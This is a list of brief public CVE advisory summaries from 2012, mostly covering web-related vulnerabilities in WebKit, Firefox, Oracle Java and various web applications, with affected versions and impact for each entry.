[CVE-2012-0638] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1.
[CVE-2012-0637] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1.
[CVE-2012-0636] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1.
[CVE-2012-0635] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0634] WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2012-03-07-1.
[CVE-2012-0633] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0632] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0631] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0630] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0629] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0628] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0627] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0626] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0625] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0624] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0623] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0622] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0621] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0620] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0619] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0618] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0617] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0616] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0615] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0614] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0613] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0612] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0611] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0610] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0609] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0608] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0607] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0606] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0605] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0604] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0603] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0602] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0601] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0600] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0599] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0598] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0597] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0596] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0595] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0594] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0593] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0592] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0591] WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-03-07-1 and APPLE-SA-2012-03-07-2.
[CVE-2012-0590] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving a drag-and-drop operation.
[CVE-2012-0589] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0586, CVE-2012-0587, and CVE-2012-0588.
[CVE-2012-0588] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0586, CVE-2012-0587, and CVE-2012-0589.
[CVE-2012-0587] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0586, CVE-2012-0588, and CVE-2012-0589.
[CVE-2012-0586] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0587, CVE-2012-0588, and CVE-2012-0589.
[CVE-2012-0582] Unspecified vulnerability in the Siebel Clinical component in Oracle Industry Applications 7.7, 7.8, 8.0.0.x, 8.1.1.x, and 8.2.2.x allows remote authenticated users to affect integrity via unknown vectors related to Web UI.
[CVE-2012-0558] Unspecified vulnerability in the Primavera P6 Enterprise Project Portfolio Management component in Oracle Primavera Products Suite 6.2.1, 8.0, 8.1, and 8.2 allows remote attackers to affect integrity via unknown vectors related to Web application.
[CVE-2012-0551] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE 7 update 4 and earlier and 6 update 32 and earlier, and the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Container or Deployment.
[CVE-2012-0550] Unspecified vulnerability in the GlassFish Enterprise Server component in Oracle Sun Products Suite GlassFish Enterprise Server 3.1.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web Container.
[CVE-2012-0516] Unspecified vulnerability in the Oracle iPlanet Web Server component in Oracle Sun Products Suite 7.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration Console.
[CVE-2012-0506] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to CORBA.
[CVE-2012-0505] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Serialization.
[CVE-2012-0503] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to I18n.
[CVE-2012-0502] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and availability, related to AWT.
[CVE-2012-0500] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and JavaFX 2.0.2 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
[CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
[CVE-2012-0477] Multiple cross-site scripting (XSS) vulnerabilities in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 allow remote attackers to inject arbitrary web script or HTML via the (1) ISO-2022-KR or (2) ISO-2022-CN character set.
[CVE-2012-0475] Mozilla Firefox 4.x through 11.0, Thunderbird 5.0 through 11.0, and SeaMonkey before 2.9 do not properly construct the Origin and Sec-WebSocket-Origin HTTP headers, which might allow remote attackers to bypass an IPv6 literal ACL via a cross-site (1) XMLHttpRequest or (2) WebSocket operation involving a nonstandard port number and an IPv6 address that contains certain zero fields.
[CVE-2012-0474] Cross-site scripting (XSS) vulnerability in the docshell implementation in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 allows remote attackers to inject arbitrary web script or HTML via vectors related to short-circuited page loads, aka "Universal XSS (UXSS)."
[CVE-2012-0473] The WebGLBuffer::FindMaxUshortElement function in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 calls the FindMaxElementInSubArray function with incorrect template arguments, which allows remote attackers to obtain sensitive information from video memory via a crafted WebGL.drawElements call.
[CVE-2012-0471] Cross-site scripting (XSS) vulnerability in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 allows remote attackers to inject arbitrary web script or HTML via a multibyte character set.
[CVE-2012-0466] template/en/default/list/list.js.tmpl in Bugzilla 2.x and 3.x before 3.6.9, 3.7.x and 4.0.x before 4.0.6, and 4.1.x and 4.2.x before 4.2.1 does not properly handle multiple logins, which allows remote attackers to conduct cross-site scripting (XSS) attacks and obtain sensitive bug information via a crafted web page.
[CVE-2012-0455] Mozilla Firefox before 3.6.28 and 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird before 3.1.20 and 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 do not properly restrict drag-and-drop operations on javascript: URLs, which allows user-assisted remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web page, related to a "DragAndDropJacking" issue.
[CVE-2012-0451] CRLF injection vulnerability in Mozilla Firefox 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 allows remote web servers to bypass intended Content Security Policy (CSP) restrictions and possibly conduct cross-site scripting (XSS) attacks via crafted HTTP headers.
[CVE-2012-0446] Multiple cross-site scripting (XSS) vulnerabilities in Mozilla Firefox 4.x through 9.0, Thunderbird 5.0 through 9.0, and SeaMonkey before 2.7 allow remote attackers to inject arbitrary web script or HTML via a (1) web page or (2) Firefox extension, related to improper enforcement of XPConnect security restrictions for frame scripts that call untrusted objects.
[CVE-2012-0435] SUSE WebYaST before 1.2 0.2.63-0.6.1 allows remote attackers to modify the hosts list, and subsequently conduct man-in-the-middle attacks, via a crafted /host request on TCP port 4984.
[CVE-2012-0428] Cross-site scripting (XSS) vulnerability in NetIQ eDirectory 8.8.6.x before 8.8.6.7 and 8.8.7.x before 8.8.7.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0419] Directory traversal vulnerability in the agent HTTP interfaces in Novell GroupWise 8.0 before Support Pack 3 and 2012 before Support Pack 1 allows remote attackers to read arbitrary files via directory traversal sequences in a request.
[CVE-2012-0411] Unspecified vulnerability in Novell iPrint Client before 5.82 allows remote attackers to execute arbitrary code via an op-client-interface-version action.
[CVE-2012-0404] Cross-site scripting (XSS) vulnerability in EMC Documentum eRoom before 7.4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0399] Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA enVision 4.x before 4.1 Patch 4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0389] Cross-site scripting (XSS) vulnerability in ForgottenPassword.aspx in MailEnable Professional, Enterprise, and Premium 4.26 and earlier, 5.x before 5.53, and 6.x before 6.03 allows remote attackers to inject arbitrary web script or HTML via the Username parameter.
[CVE-2012-0370] Cisco Wireless LAN Controller (WLC) devices with software 4.x, 5.x, 6.0, and 7.0 before 7.0.220.0 and 7.1 before 7.1.91.0, when WebAuth is enabled, allow remote attackers to cause a denial of service (device reload) via a sequence of (1) HTTP or (2) HTTPS packets, aka Bug ID CSCtt47435.
[CVE-2012-0368] The administrative management interface on Cisco Wireless LAN Controller (WLC) devices with software 4.x, 5.x, 6.0, and 7.0 before 7.0.220.0, 7.1 before 7.1.91.0, and 7.2 before 7.2.103.0 allows remote attackers to cause a denial of service (device crash) via a malformed URL in an HTTP request, aka Bug ID CSCts81997.
[CVE-2012-0337] SQL injection vulnerability in the web component in Cisco Unified MeetingPlace 7.1 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCtx08939.
[CVE-2012-0328] Janetter before 3.3.0.0 (aka 3.3.0) allows remote attackers to obtain session information for twitter.com web sites via unspecified vectors.
[CVE-2012-0327] Cross-site scripting (XSS) vulnerability in Redmine before 1.3.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0325] Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before 1.454, Jenkins LTS before 1.424.5, and Jenkins Enterprise 1.400.x before 1.400.0.13 and 1.424.x before 1.424.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0324.
[CVE-2012-0324] Cross-site scripting (XSS) vulnerability in CloudBees Jenkins before 1.454, Jenkins LTS before 1.424.5, and Jenkins Enterprise 1.400.x before 1.400.0.13 and 1.424.x before 1.424.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2012-0325.
[CVE-2012-0323] Cross-site scripting (XSS) vulnerability in the Autocomplete plugin before 3.0 for SquirrelMail allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0318] Multiple cross-site scripting (XSS) vulnerabilities in Movable Type before 4.38, 5.0x before 5.07, and 5.1x before 5.13 allow remote attackers to inject arbitrary web script or HTML via vectors involving templates, a different issue than CVE-2012-1262.
[CVE-2012-0316] The Cookpad 1.5.16 and earlier and Cookpad Noseru 1.1.1 and earlier applications for Android do not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application.
[CVE-2012-0313] Cross-site scripting (XSS) vulnerability in glucose 2 before stage 6.2 allows remote attackers to inject arbitrary web script or HTML via an RSS feed.
[CVE-2012-0312] Cross-site scripting (XSS) vulnerability in osCommerce 2.2MS1J before R9, and osCommerce Online Merchant before 2.3.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0311] Cross-site scripting (XSS) vulnerability in osCommerce 2.2MS1J before R9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0309] Cross-site scripting (XSS) vulnerability in Cogent DataHub 7.1.2 and earlier, Cascade DataHub 6.4.20 and earlier, and OPC DataHub 6.4.20 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0307] Multiple cross-site scripting (XSS) vulnerabilities in Symantec Messaging Gateway (SMG) before 10.0 allow remote attackers to inject arbitrary web script or HTML via (1) web content or (2) e-mail content.
[CVE-2012-0302] Cross-site scripting (XSS) vulnerability in Brightmail Control Center in Symantec Message Filter 6.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0301] Session fixation vulnerability in Brightmail Control Center in Symantec Message Filter 6.3 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2012-0299] The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors.
[CVE-2012-0298] The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to (1) read or (2) delete arbitrary files via unspecified vectors.
[CVE-2012-0297] The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.
[CVE-2012-0296] Multiple cross-site scripting (XSS) vulnerabilities in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0287] Cross-site scripting (XSS) vulnerability in wp-comments-post.php in WordPress 3.3.x before 3.3.1, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via the query string in a POST operation that is not properly handled by the "Duplicate comment detected" feature.
[CVE-2012-0286] Cross-site request forgery (CSRF) vulnerability in Stoneware webNetwork before 6.0.8.0 allows remote attackers to hijack the authentication of unspecified victims for requests that modify user accounts.
[CVE-2012-0285] Multiple cross-site scripting (XSS) vulnerabilities in Stoneware webNetwork before 6.0.8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-0283] Cross-site scripting (XSS) vulnerability in the tpl_mediaFileList function in inc/template.php in DokuWiki before 2012-01-25b allows remote attackers to inject arbitrary web script or HTML via the ns parameter in a medialist action to lib/exe/ajax.php.
[CVE-2012-0272] Cross-site scripting (XSS) vulnerability in the WebAccess component in Novell GroupWise 8.0 before Support Pack 3 allows remote attackers to inject arbitrary web script or HTML via the merge parameter.
[CVE-2012-0271] Integer overflow in the WebConsole component in gwia.exe in GroupWise Internet Agent (GWIA) in Novell GroupWise 8.0 before 8.0.3 HP1 and 2012 before SP1 might allow remote attackers to execute arbitrary code via a crafted request that triggers a heap-based buffer overflow, as demonstrated by a request with -1 in the Content-Length HTTP header.
[CVE-2012-0254] Stack-based buffer overflow in the HMIWeb Browser HSCDSPRenderDLL ActiveX control in Honeywell Process Solutions (HPS) Experion R2xx, R30x, R31x, and R400.x
[CVE-2012-0253] Multiple cross-site scripting (XSS) vulnerabilities in Demand Media Pluck SiteLife before 5.0.13 allow remote attackers to inject arbitrary web script or HTML via (1) the jsonRequest parameter to Direct/Process, the (2) r or (3) cb parameter to Direct/jsonp.htm, or (4) the cb parameter to sys/jsonp.app/.htm.
[CVE-2012-0245] Multiple stack-based buffer overflows in RobNetScanHost.exe in ABB Robot Communications Runtime before 5.14.02, as used in ABB Interlink Module, IRC5 OPC Server, PC SDK, PickMaster 3 and 5, RobView 5, RobotStudio, WebWare SDK, and WebWare Server, allow remote attackers to execute arbitrary code via a crafted (1) 0xA or (2) 0xE Netscan packet.
[CVE-2012-0244] Multiple SQL injection vulnerabilities in Advantech/BroadWin WebAccess before 7.0 allow remote attackers to execute arbitrary SQL commands via crafted string input.
[CVE-2012-0243] Buffer overflow in an ActiveX control in bwocxrun.ocx in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code by leveraging the ability to write arbitrary content to any pathname.
[CVE-2012-0242] Format string vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via format string specifiers in a message string.
[CVE-2012-0241] Advantech/BroadWin WebAccess before 7.0 allows remote attackers to cause a denial of service (memory corruption) via a modified stream identifier to a function.
[CVE-2012-0240] GbScriptAddUp.asp in Advantech/BroadWin WebAccess before 7.0 does not properly perform authentication, which allows remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2012-0239] uaddUpAdmin.asp in Advantech/BroadWin WebAccess before 7.0 does not properly perform authentication, which allows remote attackers to modify an administrative password via a password-change request.
[CVE-2012-0238] Stack-based buffer overflow in opcImg.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2012-0237] Advantech/BroadWin WebAccess before 7.0 allows remote attackers to (1) enable date and time syncing or (2) disable date and time syncing via a crafted URL.
[CVE-2012-0236] Advantech/BroadWin WebAccess 7.0 and earlier allows remote attackers to obtain sensitive information via a direct request to a URL. NOTE: the vendor reportedly "does not consider it to be a security risk."
[CVE-2012-0235] Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
